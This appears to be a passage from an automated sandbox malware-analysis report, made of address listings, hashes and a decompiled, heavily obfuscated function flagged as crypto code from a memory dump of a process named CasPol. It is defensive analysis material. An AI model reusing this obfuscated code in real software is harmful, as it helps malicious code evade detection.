                                                                        0x0148ea60
                                                                        0x0148ea65
                                                                        0x0148ea68
                                                                        0x0148ea6a
                                                                        0x0148ea6a
                                                                        0x0148ea6a
                                                                        0x0148ea6f
                                                                        0x0148ea76
                                                                        0x0148ea7c
                                                                        0x0148ea7e
                                                                        0x0148ea81
                                                                        0x0148ea85
                                                                        0x0148ea88
                                                                        0x0148ea8c
                                                                        0x0148ea8f
                                                                        0x0148ea93
                                                                        0x0148ea98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148ea9a
                                                                        0x0148ea9d
                                                                        0x0148eaa2
                                                                        0x0148eb0e
                                                                        0x0148eb15
                                                                        0x0148eb17
                                                                        0x0148eb33
                                                                        0x0148eb36
                                                                        0x0148eb39
                                                                        0x0148eb3f
                                                                        0x0148eb45
                                                                        0x0148eb4a
                                                                        0x0148eb52
                                                                        0x0148ecb1
                                                                        0x0148ecb9
                                                                        0x0148ecbe
                                                                        0x0148ecc3
                                                                        0x0148ecc6
                                                                        0x0148eceb
                                                                        0x0148ecee
                                                                        0x0148ecf9
                                                                        0x0148ecfe
                                                                        0x0148ed00
                                                                        0x0148ed05
                                                                        0x0148ed07
                                                                        0x0148ed0a
                                                                        0x0148ed0c
                                                                        0x0148ed0e
                                                                        0x0148ed12
                                                                        0x0148ed19
                                                                        0x0148ed1e
                                                                        0x0148ed24
                                                                        0x0148ed2a
                                                                        0x0148ed2a
                                                                        0x0148ed2c
                                                                        0x0148ed3e
                                                                        0x0148ed3e
                                                                        0x0148eb5a
                                                                        0x0148eb62
                                                                        0x0148eb69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148eb6f
                                                                        0x0148eb75
                                                                        0x0148eb79
                                                                        0x0148eb79
                                                                        0x0148eb88
                                                                        0x0148eb8e
                                                                        0x0148eb90
                                                                        0x0148eb92
                                                                        0x0148eb97
                                                                        0x0148ed3f
                                                                        0x0148ed45
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148ed4b
                                                                        0x0148ed4e
                                                                        0x00000000
                                                                        0x0148eb9d
                                                                        0x0148eb9d
                                                                        0x0148eb9d
                                                                        0x0148eba2
                                                                        0x0148ebb5
                                                                        0x0148ebbc
                                                                        0x0148ebbe
                                                                        0x0148ebbe
                                                                        0x0148ebc3
                                                                        0x0148ebc5
                                                                        0x0148ebcb
                                                                        0x0148ebd2
                                                                        0x0148ebd5
                                                                        0x0148ebdb
                                                                        0x0148ebdf
                                                                        0x0148ebe1
                                                                        0x0148ebf0
                                                                        0x0148ebf9
                                                                        0x0148ec04
                                                                        0x0148ec07
                                                                        0x0148ec0a
                                                                        0x0148ec82
                                                                        0x0148ec85
                                                                        0x0148ec8b
                                                                        0x0148ec91
                                                                        0x0148ec93
                                                                        0x0148ec96
                                                                        0x0148ec9b
                                                                        0x0148eca6
                                                                        0x0148ecac
                                                                        0x0148ecae
                                                                        0x0148ecae
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148ec0c
                                                                        0x0148ec0c
                                                                        0x0148ec0c
                                                                        0x0148ec0f
                                                                        0x0148ec12
                                                                        0x0148ec15
                                                                        0x0148ec15
                                                                        0x0148ec18
                                                                        0x0148ec1e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148ec22
                                                                        0x0148ec28
                                                                        0x0148ec4b
                                                                        0x0148ec5b
                                                                        0x0148ec5d
                                                                        0x0148ec63
                                                                        0x0148ec65
                                                                        0x0148ec68
                                                                        0x0148ec6b
                                                                        0x0148ec6b
                                                                        0x0148ec70
                                                                        0x0148ec71
                                                                        0x0148ec74
                                                                        0x0148ec7d
                                                                        0x00000000
                                                                        0x0148ebe3
                                                                        0x0148ebe3
                                                                        0x0148ebe6
                                                                        0x0148ebe6
                                                                        0x0148ebe7
                                                                        0x0148ebe9
                                                                        0x0148ebec
                                                                        0x00000000
                                                                        0x0148ebe6
                                                                        0x0148ebe1
                                                                        0x0148eba4
                                                                        0x0148eba9
                                                                        0x0148ebb0
                                                                        0x0148ebb3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148ebab
                                                                        0x0148ebab
                                                                        0x0148ebab
                                                                        0x0148ebac
                                                                        0x0148ebac
                                                                        0x00000000
                                                                        0x0148ebab
                                                                        0x0148eb97
                                                                        0x0148eb19
                                                                        0x0148eb1c
                                                                        0x0148eb21
                                                                        0x0148eb26
                                                                        0x0148eb2c
                                                                        0x0148eb2c
                                                                        0x00000000
                                                                        0x0148eb26
                                                                        0x0148ead6
                                                                        0x0148ead9
                                                                        0x0148eadc
                                                                        0x0148eadc
                                                                        0x0148eadc
                                                                        0x0148eade
                                                                        0x0148eae4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148eaee
                                                                        0x0148eaf7
                                                                        0x0148eaf9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148eb04
                                                                        0x0148eb12
                                                                        0x00000000
                                                                        0x0148eb12
                                                                        0x0148eb06
                                                                        0x00000000
                                                                        0x0148eb06
                                                                        0x0148eaf0
                                                                        0x0148eaf2
                                                                        0x0148eaf4
                                                                        0x00000000
                                                                        0x0148eaf4
                                                                        0x0148ea6a
                                                                        0x0148ea21
                                                                        0x00000000
                                                                        0x0148ea21
                                                                        0x0148e9d6
                                                                        0x0148e9d6
                                                                        0x0148e9e0
                                                                        0x0148e9e2
                                                                        0x0148e9e2
                                                                        0x0148e9e8
                                                                        0x00000000
                                                                        0x0148e9e8
                                                                        0x0148e987
                                                                        0x0148e98f
                                                                        0x0148e992
                                                                        0x0148e995
                                                                        0x0148e995
                                                                        0x0148e998
                                                                        0x0148e998
                                                                        0x0148e99a
                                                                        0x0148e9a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e9a9
                                                                        0x0148e9b2
                                                                        0x0148e9b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0148e9ba
                                                                        0x0148e9c1
                                                                        0x0148e9cf
                                                                        0x00000000
                                                                        0x0148e9cf
                                                                        0x0148e9c3
                                                                        0x00000000
                                                                        0x0148e9c3
                                                                        0x0148e9ab
                                                                        0x0148e9ad
                                                                        0x0148e9af
                                                                        0x00000000
                                                                        0x0148e9af
                                                                        0x0148e924
                                                                        0x0148e8b7
                                                                        0x0148e8ba
                                                                        0x0148e902
                                                                        0x0148e908
                                                                        0x0148e90a
                                                                        0x00000000
                                                                        0x0148e90a
                                                                        0x0148e8bc
                                                                        0x0148e8bf
                                                                        0x0148e8f9
                                                                        0x0148e8ff
                                                                        0x0148e901
                                                                        0x00000000
                                                                        0x0148e901
                                                                        0x0148e8c1
                                                                        0x0148e8c4
                                                                        0x0148e8f0
                                                                        0x0148e8f6
                                                                        0x0148e8f8
                                                                        0x00000000
                                                                        0x0148e8f8
                                                                        0x0148e8c6
                                                                        0x0148e8c9
                                                                        0x0148e8e7
                                                                        0x0148e8ed
                                                                        0x0148e8ef
                                                                        0x00000000
                                                                        0x0148e8ef
                                                                        0x0148e8cb
                                                                        0x0148e8ce
                                                                        0x0148e8de
                                                                        0x0148e8e4
                                                                        0x0148e8e6
                                                                        0x00000000
                                                                        0x0148e8e6
                                                                        0x0148e8d3
                                                                        0x00000000
                                                                        0x0148e8d5
                                                                        0x0148e8db
                                                                        0x0148e8dd
                                                                        0x00000000
                                                                        0x0148e8dd
                                                                        0x0148e853
                                                                        0x0148e855
                                                                        0x0148e85b
                                                                        0x0148e85d
                                                                        0x0148e897
                                                                        0x0148e89c
                                                                        0x0148e8a2
                                                                        0x0148e8a6
                                                                        0x0148e8ab
                                                                        0x0148e8ad
                                                                        0x0148e8ad
                                                                        0x00000000
                                                                        0x0148e85d

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1eb4d73163f872c691c4f437cf1ba678131635d5f8c917ea27ed40cddd4a14e1
                                                                        • Instruction ID: ed47b24f987b26ee90ffe4cb7e6eaa5dc0c3a260701d9336e6729679b64772eb
                                                                        • Opcode Fuzzy Hash: 1eb4d73163f872c691c4f437cf1ba678131635d5f8c917ea27ed40cddd4a14e1
                                                                        • Instruction Fuzzy Hash: CE02C172E006169BCB18DFADC89167EFBF6EF88200B59816ED456EB391D734E901CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00421F9F Relevance: .5, Instructions: 489COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 50%
                                                                        			E00421F9F(signed int __eax, signed int __ebx, intOrPtr __ecx, signed char __edx, void* __edi, signed int __esi) {
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed char _t58;
				signed int _t60;
				signed int _t61;
				signed int _t64;

				_t60 = __esi;
				_t58 = __edx;
				_t56 = __ecx;
				_t54 = __ebx;
				_t53 = __eax;
				_push(__ebx);
				 *0x5fa31dc0 =  *0x5fa31dc0 - __eax;
				 *0xaba8cea9 =  *0xaba8cea9 - __esi;
				asm("sbb [0x121975ee], ecx");
				_push( *0xfafb31d4);
				if((_t64 |  *0x7e40aafb) < 0) {
					L1:
					asm("sbb [0xc36efb09], edx");
					asm("adc [0x767ba821], ebx");
					 *0x240d8bd4 =  *0x240d8bd4 >> 0;
					_t53 = _t53 & 0x0000000c;
					_t61 = (_t61 &  *0x857f151d) + 0x00000001 &  *0x742bcdf8;
					 *0x8e9a6d6 =  *0x8e9a6d6 >> 0x41;
					asm("sbb ebp, [0x8771e3b]");
					_push(_t61);
					_t60 = _t60 &  *0x912dd0fb;
					_t58 = _t58 & 0x00000020;
					asm("rol byte [0xf89935f2], 0x22");
					asm("rol dword [0xfbe9540d], 0x6c");
					 *0x9459ca0a = _t56;
					 *0xfe6304d9 =  *0xfe6304d9 << 0x56;
					asm("adc bl, [0xc320ed3c]");
					asm("scasb");
					_t56 =  *0x9459ca0a - 1;
					 *0xaab74829 =  *0xaab74829 ^ _t53;
					asm("rcl dword [0x7f106817], 0x35");
					asm("adc eax, [0x9d56ea15]");
					_t54 = _t54 +  *0x5ceec7ba &  *0x3b22d9f7;
					 *0x874bd2d7 =  *0x874bd2d7 << 0x52;
					goto L1;
				}
				asm("sbb ebp, [0x9a8f6272]");
				__esi = __esi + 1;
				 *0x1862fdd7 =  *0x1862fdd7 >> 0x9c;
				_push( *0xf8b45f6e);
				asm("sbb ebp, [0x196aab0e]");
				__ecx = __ecx | 0xa3a919c8;
				asm("sbb [0x4750a32e], edi");
				__esi = __esi +  *0x4327d1a1;
				__bl = __bl ^  *0x798db3f2;
				 *0x1b0f7423 =  *0x1b0f7423 + __ecx;
				asm("cmpsw");
				_pop(__edx);
				__eax =  *0xd0cd7109;
				__eax =  *0xb9ca4a15;
				__ah = __ah & 0x00000038;
				_pop(__edi);
				asm("stosd");
				asm("adc [0xcd0bb7d9], eax");
				_t10 = __eax;
				__eax =  *0xc5211dd9;
				 *0xc5211dd9 = _t10;
				__esp = __eax;
				__esp = 0x2b4e6c91;
				 *0x888bc184 = __dl;
				_pop(__esp);
				__edx = __edx &  *0x8e681d33;
				asm("rcl dword [0x74e2cd1f], 0x7c");
				asm("sbb eax, [0xe5790765]");
				asm("lodsd");
				__edx = __edx |  *0xd7735ccf;
				 *0x628d0b11 =  *0x628d0b11 << 0x70;
				__ah = __ah + 0xca;
				__ah = __ah ^ 0x0000002a;
				__eax =  *0x109fb7eb;
				 *0x109fb7eb =  *0xc5211dd9;
				__eax =  *0x2a50d527;
				 *0x2a50d527 =  *0x109fb7eb;
				asm("sbb al, [0x7ee59c9]");
				asm("rol dword [0xb17a2a11], 0xdf");
				__ebp = __ebp ^  *0x610e950d;
				__ecx = __ecx - 0x162ce9f5;
				_push( *0xd4e72c97);
				 *0x9e2107b2 =  *0x9e2107b2 & __dl;
				__ebx = __ebx - 1;
				__dh = __dh ^  *0x7a7a3f34;
				_pop(__ebp);
				asm("adc [0x3145ebbd], eax");
				__ebx = __ebx +  *0x264180fa;
				__ebx = __ebx +  *0xa44e9ed4;
				if(__ebx > 0) {
					goto L1;
				}
				 *0x5b37b0ca =  *0x5b37b0ca + __dh;
				 *0xadbbbb8f =  *0xadbbbb8f >> 0x33;
				 *0xfe928ff5 =  *0xfe928ff5 >> 0x28;
				__eax = __eax ^ 0x16a458f8;
				asm("scasb");
				asm("sbb [0x90ed95f6], ah");
				__edi = 0x182c1d1b;
				__edi = __eax;
				__edx = __edx + 0xbb972306;
				asm("adc [0xd765b23c], al");
				_pop( *0x265df819);
				__ebx = __ebx + 1;
				_pop( *0xa54d01a1);
				__edi =  *0xa4fe8203;
				__al = __al - 0x82;
				asm("rcr dword [0xd83298de], 0x32");
				__esi = __esi ^  *0xd0cd7167;
				__edx =  *0x73b7c91d;
				 *0xaad21cb7 = __ah;
				__ebx = __ebx |  *0x51230fed;
				asm("sbb cl, 0x82");
				__esp = 0x2b4e6c91 ^  *0xe0fb2a31;
				__eax = __eax +  *0xc7cb36e;
				asm("ror byte [0x3047ce12], 0x4c");
				 *0x650ee89b =  *0x650ee89b - __ecx;
				 *0xdcfc7c19 =  *0xdcfc7c19 ^ 0x2b4e6c91;
				__ecx = __ecx |  *0x5b1b0d31;
				__ecx = __ecx - 0xbdbf9096;
				 *0x1d9fdbdf =  *0x1d9fdbdf >> 0xc;
				__esi = __esi &  *0x231b6cc0;
				__edx =  *0x73b7c91d &  *0x7139aadc;
				__ebx = __ebx -  *0xf811d0cd;
				 *0x6418c7a0 =  *0x6418c7a0 | __dh;
				asm("adc al, 0x28");
				__edi =  *0x564e3a8f;
				 *0x564e3a8f =  *0xa4fe8203;
				__ecx = __ecx -  *0xa0d78b13;
				__ebp = __ebp | 0x1907ee68;
				__edi =  *0xad110d69 * 0x3103;
				__esi = __esi - 1;
				 *0xd787c0ca =  *0xd787c0ca & __dl;
				__ebp = __ebp - 1;
				 *0x2d517d05 =  *0x2d517d05 ^ __eax;
				__ecx = __ecx + 1;
				asm("rcl dword [0xd0cd7109], 0x9b");
				__ebp = __ebp &  *0x1b4de019;
				asm("lodsd");
				asm("adc edx, [0xea9304ef]");
				asm("sbb [0xf75fccf0], ebx");
				L1();
				asm("adc [0xcd27f634], bh");
				 *0xf6c311d0 =  *0xf6c311d0 ^ __dl;
				asm("lodsd");
				 *0x50701dff =  *0x50701dff - 0x2b4e6c91;
				if( *0x50701dff >= 0) {
					goto L1;
				}
				__esi =  *0xe8f0da7d * 0x120c;
				 *0x7ee92d1 = __edx;
				asm("adc [0x4ab62e15], edx");
				asm("sbb eax, 0x2c637e8f");
				_pop(__esp);
				__eax = __eax - 0x97c12fb8;
				__ebx = __ebx - 1;
				asm("adc esp, 0xc2cb961f");
				 *0xc3d5501d =  *0xc3d5501d >> 0x7e;
				__ecx = __ecx - 1;
				_pop(__esp);
				__bh = __bh | 0x00000032;
				asm("adc ebx, [0xcbe77dfb]");
				__esi =  *0xe8f0da7d * 0x0000120c ^  *0x5f188f61;
				__ebp = __ebp + 0x3973a6fb;
				asm("ror dword [0xf2b13499], 0xff");
				__al = __al ^  *0x19d765b2;
				_t20 = __edx;
				__edx =  *0x352fc315;
				 *0x352fc315 = _t20;
				asm("sbb eax, [0xec9959dd]");
				__eax = __eax - 1;
				asm("adc edi, 0x752acd23");
				_pop(__ecx);
				asm("sbb ebp, [0x1847571d]");
				__dh =  *0xad3f348a;
				__edi = __edi +  *0xb965bdee;
				asm("cmpsb");
				__ebp = __ebp -  *0xffdb760e;
				__ecx = __ecx +  *0xf346d9d6;
				__eax =  *0xa64348f0;
				if(( *0x7cd2fe33 & __edx) != 0) {
					goto L1;
				}
				_pop( *0x109f87b);
				__edx = __edx &  *0x1b50520d;
				__ebx = __ebx & 0xb1be2715;
				asm("adc esp, [0x9db44bdd]");
				__edx = __edx | 0x845a5701;
				__edx = __edx |  *0x28af96d1;
				__ebp =  *0xcd1b8903;
				__ebx = __ebx &  *0x46dd1dd9;
				__esp = __eax;
				__eax = 0xb51c4bf5;
				__edi = 0x55165809;
				 *0x696dc7fa =  *0x696dc7fa - __edx;
				_t25 = __ebx;
				__ebx =  *0x9b79bff3;
				 *0x9b79bff3 = _t25;
				if( *0x696dc7fa >= 0) {
					goto L1;
				}
				 *0xb2221573 =  *0xb2221573 >> 0x5a;
				__esi = __esi & 0xb321d765;
				 *0x5410bb83 =  *0x5410bb83 & __ecx;
				 *0x9f4a98e1 =  *0x9f4a98e1 >> 0xad;
				__edi = 0x55165809 &  *0x5ab47033;
				if(0x55165809 < 0) {
					goto L1;
				}
				__ecx =  *0x3029687c * 0xb976;
				__edi = __edi +  *0xc34df168;
				__ah = __ah ^  *0x19cba588;
				_push(0xb51c4bf5);
				asm("scasb");
				__ebp = __ebp & 0xe0bac5f7;
				__ebp = __ebp |  *0xbf1113ea;
				__edi = __edi - 1;
				 *0x3d4ac2f8 =  *0x3d4ac2f8 >> 0x98;
				asm("adc dh, [0xcd71092a]");
				 *0x2e2115d0 =  *0x2e2115d0 ^ __dh;
				asm("stosb");
				 *0x4c5179f6 =  *0x4c5179f6 << 0x3c;
				__ebx = __ebx ^ 0xcaedaa85;
				asm("adc ebx, [0x77a9c361]");
				__edi =  *0x7ba8fa9a;
				if(__ebx == 0) {
					goto L1;
				}
				__eax = 0xb51c4bf5 ^  *0x1611d974;
				 *0x1184f4fe =  *0x1184f4fe + __ebp;
				 *0xc1fcc9c =  *0xc1fcc9c - __ecx;
				 *0x12171589 =  *0x12171589 + 0x2b4e6c91;
				_t30 = __al;
				__al =  *0x7ee64e4;
				 *0x7ee64e4 = _t30;
				__ecx = __ecx - 0x6f7a8d11;
				 *0xf2618718 =  *0xf2618718 << 0x79;
				 *0x6cd10930 = __ah;
				 *0x9f7d091c =  *0x9f7d091c >> 0x9a;
				__bh = 0xe0;
				__edi = __edi ^ 0x03515bc4;
				_pop( *0x981f21ce);
				 *0x3749136d = __esi;
				if(__edi >= 0) {
					goto L1;
				}
				__esp = __esp &  *0x11d0cd71;
				__ecx = __ecx +  *0x26d7f02e;
				__edi =  *0xcf9d096a * 0xd03;
				asm("adc edx, [0x25079223]");
				asm("ror dword [0x676d6de], 0xf2");
				asm("cmpsw");
				 *0x885b0f27 = __edi;
				 *0x8101c1b3 =  *0x8101c1b3 & __dl;
				asm("sbb bl, 0x8");
				__edx = __edx | 0xd8ff41cd;
				__eax = 0x7180bc35;
				if(0x2b4e6c91 >  *0xd1a67f1f) {
					goto L1;
				}
				__ch = __ch ^ 0x000000ca;
				 *0x8f60f463 =  *0x8f60f463 << 0xe3;
				 *0xf8291562 =  *0xf8291562 >> 0xc;
				 *0x5e6673fa =  *0x5e6673fa >> 0x48;
				asm("rcl dword [0xe5cb9994], 0x4d");
				_t35 = __ebp;
				__ebp =  *0xac103c94;
				 *0xac103c94 = _t35;
				if( *0xf8291562 != 0) {
					goto L1;
				}
				__esi = __esi ^ 0x7a81f67b;
				asm("ror dword [0x1dd9506f], 0x88");
				__edi = __edi + 1;
				__eax = __eax & 0xd8512d2f;
				__ebp = __ebp +  *0x8d3810c4;
				__ebx = 0xba024d94;
				_push(__esi);
				_push( *0x52ad0319);
				_t36 = __edi;
				__edi =  *0x158ce20d;
				 *0x158ce20d = _t36;
				__edi =  *0xf212a26b * 0x65b2;
				__ecx = __ecx ^  *0x49287f0d;
				asm("scasb");
				if(__ecx > 0) {
					goto L1;
				}
				asm("sbb ebx, [0x46a8af77]");
				 *0x20e4e67 = __edi;
				_pop(__esp);
				 *0xaa1a4211 = __edi;
				__ecx = __ecx +  *0xee0c89d5;
				__esi =  *0x72d466fd;
				__esi =  *0x72d466fd | 0xee8e7cc5;
				asm("rol dword [0x216f0bcd], 0x61");
				L1();
				 *0xae2324e8 =  *0xae2324e8 << 0x32;
				asm("sbb bh, 0x63");
				asm("sbb ecx, [0x4c8517ce]");
				if( *0xae2324e8 <= 0) {
					goto L1;
				}
				__edi = __edi | 0x02413476;
				asm("rcr dword [0x5821d992], 0x8b");
				 *0x6cf9565 =  *0x6cf9565 & 0xba024d94;
				_pop( *0x3d11c52f);
				__bh = 0x000000e0 |  *0x98466a0;
				asm("sbb eax, 0xbd18a5a9");
				__eax = 0x7381bc25;
				_pop(__edi);
				__cl = __cl &  *0x11e0fdb1;
				_pop(__ebx);
				_push(0x7381bc25);
				 *0x87f1111b =  *0x87f1111b - 0x7381bc25;
				asm("ror byte [0xfa810cb3], 0xed");
				 *0xe44f6bf4 =  *0xe44f6bf4 << 0xb9;
				__edi = __edi + 1;
				__ecx = __ecx | 0xa4f67792;
				 *0x302507c8 =  *0x302507c8 << 0x55;
				asm("lodsd");
				asm("cmpsb");
				asm("sbb ch, 0x38");
				__ebx = 0xffffffffba024d93;
				asm("sbb ch, 0xc9");
				 *0x7382de91 =  *0x7382de91 ^ __esi;
				__ebx = 0xffffffffba024d92;
				 *0xc987b321 =  *0xc987b321 << 0xae;
				__ecx =  *0xeda0ba6b * 0x3054;
				asm("sbb edx, [0x226d1283]");
				 *0x628f6064 =  *0x628f6064 << 0xce;
				asm("adc edx, [0xbed5fb15]");
				__eax = 0x7381bc24;
				asm("sbb ebp, 0x16ecc6d5");
				_push(__edx);
				__edx = __edx - 0xb79bec35;
				__ecx =  *0x6fc32d69 * 0xcdad;
				_push(0x7381bc25);
				__ecx =  *0xf6ad15d9;
				asm("cmpsw");
				 *0xa8faa8ce =  *0xa8faa8ce | __edi;
				asm("ror dword [0xd319132f], 0x3d");
				__edx = __edx & 0xe0a58739;
				asm("adc edx, 0xcd0bbefe");
				_push(0x7381bc25);
				__esp = __esp +  *0xb40d15d9;
				asm("rcl dword [0x5ae1e665], 0x5d");
				__edx = __edx -  *0xfb0bbb9a;
				__edi = __edi +  *0xf1fbb431;
				if(__edi < 0) {
					goto L1;
				}
				0xffffffffba024d92 ^  *0x1dd99c26 = 0xba506ad9;
				__eax =  *0x4713d703;
				asm("rol dword [0x976b5f6c], 0xf3");
				 *0xdf942581 =  *0xdf942581 << 0x32;
				asm("lodsb");
				__al = __al +  *0xbc030e2c;
				_pop(__ebx);
				 *0xc28f2735 =  *0xc28f2735 + 0x2b4e6c91;
				asm("scasd");
				asm("rol dword [0x6111d765], 0x97");
				 *0xc464ff37 =  *0xc464ff37 - __edi;
				 *0x1003bfe1 =  *0x1003bfe1 ^ __al;
				 *0x9f62d414 =  *0x9f62d414 >> 0x1d;
				__eax = 0x7ee64ee;
				 *0x2c6e901d =  *0x2c6e901d | __ecx;
				if( *0x2c6e901d != 0) {
					goto L1;
				}
				asm("rol dword [0xc3d1ca7a], 0x41");
				 *0xdd044e2c =  *0xdd044e2c << 0x94;
				asm("movsb");
				__esi = 0xba506ad9;
				if( *0xdd044e2c >= 0) {
					goto L1;
				}
				 *0x5872c771 =  *0x5872c771 | __esi;
				__edx = __edx - 1;
				asm("rcl dword [0x9fe4e29], 0xcb");
				__esp = __esp + 1;
				asm("sbb [0x6e5ae985], esi");
				__dl = __dl & 0x000000d7;
				asm("ror dword [0xd38c2511], 0xc");
				if(__dl < 0) {
					goto L1;
				}
				 *0xe7ec9870 =  *0xe7ec9870 ^ __edi;
				 *0x6a897a38 =  *0x6a897a38 + __cl;
				__edx =  *0xb881defa;
				 *0x191507ee =  *0x191507ee >> 0x26;
				__ebp =  *0x2589eff1;
				asm("sbb edx, 0xd046209");
				__ebx = 0xfffffffffadaefdf;
				 *0xa1da84d4 =  *0xa1da84d4 & __esi;
				_t39 = __edi;
				__edi =  *0xd950cd0b;
				 *0xd950cd0b = _t39;
				__edi =  *0x902fcb1d;
				 *0x902fcb1d =  *0xd950cd0b;
				asm("scasb");
				_t41 = __esp;
				__esp =  *0xf3c38e91;
				 *0xf3c38e91 = _t41;
				 *0x124e5e04 =  *0x124e5e04 >> 0x7a;
				__edi =  *0x186e5681;
				 *0x186e5681 =  *0x902fcb1d;
				asm("sbb al, [0x1f50cdc9]");
				asm("sbb edi, [0x892f2389]");
				 *0x588a1dd7 =  *0x588a1dd7 << 0xd5;
				 *0x15c8e199 =  *0x15c8e199 + __ecx;
				__ch = __ch +  *0x60350bd0;
				 *0xe834982c =  *0xe834982c >> 0xda;
				asm("cmpsb");
				__edi =  *0x186e5681 +  *0x437677de;
				asm("sbb ebx, 0xf762d403");
				__esi =  *0xb20cc76a * 0xd765;
				 *0x2182d50e =  *0x2182d50e << 0x2c;
				_pop(__eax);
				__ebx = 0x3778a45;
				asm("sbb al, [0x4817d20a]");
				__bl = __bl -  *0x897665c9;
				if(__bl >= 0) {
					goto L1;
				}
				asm("sbb ecx, 0xc9d34673");
				__ebx = 0x2363a550;
				_t51 = __ecx;
				__ecx =  *0x716f2a65;
				 *0x716f2a65 = _t51;
				if(0xba506ad9 >= 0) {
					goto L1;
				}
				 *0x706ddf79 =  *0x706ddf79 << 0x90;
				_push( *0x378b0d05);
				__edi = __edi -  *0x95e2063f;
				 *0x680211d9 = 0x7ee64ee;
				__bl = __bl ^ 0x0000003a;
				 *0x35cc929b =  *0x35cc929b | __edi;
				__edx = __edx |  *0x7cd79681;
				_t52 = __ecx;
				__ecx =  *0xf39fca26;
				 *0xf39fca26 = _t52;
				__ebp = __ebp ^  *0x93fc1907;
				 *0xbee10567 =  *0xbee10567 & __esi;
				asm("adc [0x95d8d09b], esi");
				__edx = __ebp;
				__ch =  *0x2efe0bb2;
				_pop( *0xd525176c);
				__eax = 0x7ee64ee +  *0x71098ec4;
				asm("adc edi, [0xc715d0cd]");
				asm("adc [0x9afc8c2e], eax");
				__eax = 0x7ee64ee +  *0x71098ec4 + 1;
				 *0x7d9b68e1 =  *0x7d9b68e1 - 0xe0;
				_push(0x7ee64ee);
				 *0xdf6c4fa2 =  *0xdf6c4fa2 - __bl;
				__ebx = 0x2363a550 -  *0xb07c9ceb;
				_push(0x7ee64ee);
				__ebp = __ebp + 0xff0115d9;
				asm("adc edx, [0x950257ce]");
				 *0x93c08520 =  *0x93c08520 >> 0x52;
				 *0xee64300d =  *0xee64300d + __edx;
				__edx = __edx - 1;
				__ecx =  *0xf39fca26 |  *0xcd1d8e95;
				_push(0x7ee64ee);
				__ebp = __ebp ^  *0xbe8cd94;
				asm("stosd");
				_push( *0x3f32efd8);
				if(__ebp <= 0) {
					goto L1;
				}
				asm("adc esp, 0xa652c176");
				asm("rcl dword [0x95b9af39], 0x7d");
				_pop(__edi);
				 *0xcd713763 =  *0xcd713763 ^ __al;
				__dh = __dh + 0xd0;
				__edx = __edx -  *0xe4158615;
				__esp = __esp + 1;
				_pop(__ebx);
				asm("stosb");
				asm("adc ah, 0x12");
				asm("sbb [0x535018b1], cl");
				__ecx = __ecx -  *0x112e21c0;
				_push(0x201dd99b);
				 *0xa9b689d1 = __edx;
				 *0xba1998a2 =  *0xba1998a2 + __bh;
				 *0x5fa21826 =  *0x5fa21826 >> 0xd7;
				__eax = __eax & 0x0c36e507;
				__edx =  *0x2d1e8569 * 0xb23c;
				 *0x116cce38 =  *0x116cce38 & __bl;
				asm("rcr byte [0x4d2cc412], 0x9b");
				__ecx = __ecx + 1;
				__ebx = __ebx &  *0x994419be;
				asm("adc ecx, 0x7f18d09");
				asm("ror dword [0x31624b9b], 0xcc");
				__esp = 0x19d0cd68;
				 *0xc870bfc1 =  *0xc870bfc1 << 0xf3;
				if(__edi == 0) {
					goto L1;
				}
				asm("rcl dword [0x4b0ac74], 0x53");
				__esp = 0x19d0cd69;
				return __eax;
			}










                                                                        0x00421f9f
                                                                        0x00421f9f
                                                                        0x00421f9f
                                                                        0x00421f9f
                                                                        0x00421f9f
                                                                        0x00421f9f
                                                                        0x00421fa0
                                                                        0x00421fa6
                                                                        0x00421fac
                                                                        0x00421fb8
                                                                        0x00421fbe
                                                                        0x0042177d
                                                                        0x0042177d
                                                                        0x00421783
                                                                        0x00421789
                                                                        0x004217a2
                                                                        0x004217a5
                                                                        0x004217ab
                                                                        0x004217b2
                                                                        0x004217b8
                                                                        0x004217b9
                                                                        0x004217c5
                                                                        0x004217c8
                                                                        0x004217cf
                                                                        0x004217d6
                                                                        0x004217dc
                                                                        0x004217e9
                                                                        0x004217f9
                                                                        0x004217fa
                                                                        0x004217fb
                                                                        0x00421801
                                                                        0x00421808
                                                                        0x0042180e
                                                                        0x00421814
                                                                        0x00000000
                                                                        0x00421814
                                                                        0x00421fc4
                                                                        0x00421fca
                                                                        0x00421fcb
                                                                        0x00421fd2
                                                                        0x00421fd8
                                                                        0x00421fde
                                                                        0x00421fe4
                                                                        0x00421fea
                                                                        0x00421ff0
                                                                        0x00421ff6
                                                                        0x00421fff
                                                                        0x00422001
                                                                        0x00422002
                                                                        0x00422007
                                                                        0x0042200c
                                                                        0x00422010
                                                                        0x00422011
                                                                        0x0042201e
                                                                        0x00422025
                                                                        0x00422025
                                                                        0x00422025
                                                                        0x0042202b
                                                                        0x0042202c
                                                                        0x00422031
                                                                        0x00422037
                                                                        0x00422038
                                                                        0x0042203e
                                                                        0x00422045
                                                                        0x0042204b
                                                                        0x0042204c
                                                                        0x00422052
                                                                        0x00422059
                                                                        0x0042205c
                                                                        0x0042205f
                                                                        0x0042205f
                                                                        0x00422065
                                                                        0x00422065
                                                                        0x0042206b
                                                                        0x00422071
                                                                        0x00422078
                                                                        0x0042207e
                                                                        0x00422084
                                                                        0x0042208a
                                                                        0x00422090
                                                                        0x00422091
                                                                        0x00422097
                                                                        0x00422098
                                                                        0x004220a4
                                                                        0x004220aa
                                                                        0x004220b0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004220bb
                                                                        0x004220c7
